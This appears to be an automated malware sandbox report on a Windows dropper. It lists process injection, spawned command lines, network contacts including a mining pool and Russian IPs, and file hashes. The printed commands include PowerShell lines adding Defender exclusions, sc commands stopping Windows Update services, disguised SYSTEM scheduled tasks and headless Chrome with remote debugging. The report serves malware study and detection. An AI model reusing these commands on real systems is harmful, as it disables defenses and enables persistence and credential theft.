Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 4456 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3164 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 2684 wrote to memory of 3388 N/A C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 4456 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 4456 wrote to memory of 2064 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 3388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 3388 wrote to memory of 4692 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 2992 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 1860 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 4280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 4280 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 4692 wrote to memory of 208 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe

"C:\Users\Admin\AppData\Local\Temp\344a606ed74ef65f9f3d831c904193265ecaa4ee4ba26541fc6893ecc428e9fc.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=33616 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data6FGCV" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa71f69758,0x7ffa71f69768,0x7ffa71f69778

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=1244 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1552 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=33616 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1872 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1720 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2108 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=2972 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3160 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=33616 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=3292 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=3520 --field-trial-handle=1376,i,11556867831386188153,5519478865879465498,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x3cc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3164 -s 296

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "Start-Process <#ablowysowmhywqfdn#> powershell <#ablowysowmhywqfdn#> -Verb <#ablowysowmhywqfdn#> runAs" -WindowStyle hidden -Argument 'Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 14:06 /f /tn MicrosoftEdgeTask_MTA1 /tr "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle hidden Add-MpPreference -ExclusionPath "C:\ProgramData\sY2NsQjNsETOsATOsIDOsUWOsIWOsMDOsU2NsUWO\MTA1.exe" -Force

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /sc daily /st 14:06 /f /tn "AppLaunch" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 21.170.83.51.in-addr.arpa udp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 153.136.76.144.in-addr.arpa udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.250.179.206:443 ogs.google.com tcp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 apis.google.com udp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 14.214.58.216.in-addr.arpa udp
US 8.8.8.8:53 206.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 206.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
DE 172.217.23.214:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 142.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 214.23.217.172.in-addr.arpa udp
US 8.8.8.8:53 106.208.58.216.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com udp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 194.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.251.39.98:443 googleads.g.doubleclick.net tcp
NL 142.251.39.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 98.39.251.142.in-addr.arpa udp
DE 172.217.23.214:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com tcp
NL 142.251.36.1:443 yt3.ggpht.com udp
US 8.8.8.8:53 1.36.251.142.in-addr.arpa udp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 80.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 163.1.85.104.in-addr.arpa udp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
RU 185.159.129.168:80 tcp
RU 185.149.146.118:80 tcp
RU 77.91.77.144:80 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
N/A 127.0.0.1:33616 tcp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 172.67.34.170:80 pastebin.com tcp
US 172.67.34.170:443 pastebin.com tcp
RU 46.29.235.84:80 46.29.235.84 tcp
US 8.8.8.8:53 170.34.67.172.in-addr.arpa udp
US 8.8.8.8:53 84.235.29.46.in-addr.arpa udp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp
US 8.8.8.8:53 217.192.94.141.in-addr.arpa udp
US 8.8.8.8:53 3.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 126.130.241.8.in-addr.arpa udp

Files

memory/2684-122-0x0000000001C10000-0x0000000001C39000-memory.dmp

memory/2684-123-0x0000000001C40000-0x0000000001C7F000-memory.dmp

memory/2684-124-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/2684-125-0x00000000036B0000-0x00000000036E8000-memory.dmp

memory/2684-126-0x0000000073290000-0x000000007397E000-memory.dmp

memory/2684-127-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-128-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-129-0x00000000061B0000-0x00000000066AE000-memory.dmp

memory/2684-130-0x0000000003970000-0x00000000039A4000-memory.dmp

memory/2684-131-0x0000000003850000-0x0000000003856000-memory.dmp

memory/2684-132-0x00000000066B0000-0x0000000006CB6000-memory.dmp

memory/2684-133-0x0000000006CC0000-0x0000000006DCA000-memory.dmp

memory/2684-135-0x00000000061A0000-0x00000000061B0000-memory.dmp

memory/2684-134-0x0000000003A90000-0x0000000003AA2000-memory.dmp

memory/2684-136-0x00000000060F0000-0x000000000612E000-memory.dmp

memory/2684-137-0x0000000006150000-0x000000000619B000-memory.dmp

memory/2684-138-0x0000000000400000-0x00000000018CF000-memory.dmp

memory/2684-139-0x0000000001C10000-0x0000000001C39000-memory.dmp

memory/2684-140-0x0000000001C40000-0x0000000001C7F000-memory.dmp

memory/2684-141-0x0000000073290000-0x000000007397E000-memory.dmp

memory/2684-142-0x0000000006EC0000-0x0000000006F36000-memory.dmp

memory/2684-143-0x0000000006F40000-0x0000000006FD2000-memory.dmp

memory/2684-144-0x00000000070E0000-0x0000000007146000-memory.dmp

memory/2684-145-0x0000000007A20000-0x0000000007A70000-memory.dmp

memory/2684-146-0x0000000007AC0000-0x0000000007C82000-memory.dmp

memory/2684-147-0x0000000007C90000-0x00000000081BC000-memory.dmp

memory/2684-148-0x00000000061A0000-0x00000000061B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\mi.exe

MD5 aba23d7f60f40f4dee64fa440d5db6e6
SHA1 dde62462dc7887a6b3ba193eafb50da17ef40e67
SHA256 6398817cc923cfad6178c53c6ba9da1f30c426cd183bfdf86889faba8b4732d6
SHA512 ad89270a47e292c931f47da322c055e168b0c4e28de69a20cbf42db9e60fbd59ceb02c01d1c18b1c931d0f23d19230b1c6390d98f36048a3c581b78ffe75ce40

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
SHA512 2f83ef2eaf8951d392f32405dd9c2555be803f63cbdb9118c4204ad148a254a19aa593082a2f5c7a1b962329df08fede026d0715513adf26d838f043fd451959

C:\Users\Admin\AppData\Local\Temp\cli.exe

MD5 b78141a544759e1a07740aa28b35584c
SHA1 af95ccd7d12c7ed7bdc6782373302118d2ebe3a8
SHA256 e268b72e92c9d9af52c25f4d7643bd96c84172fadb4e7a300091eb287ee3a35d
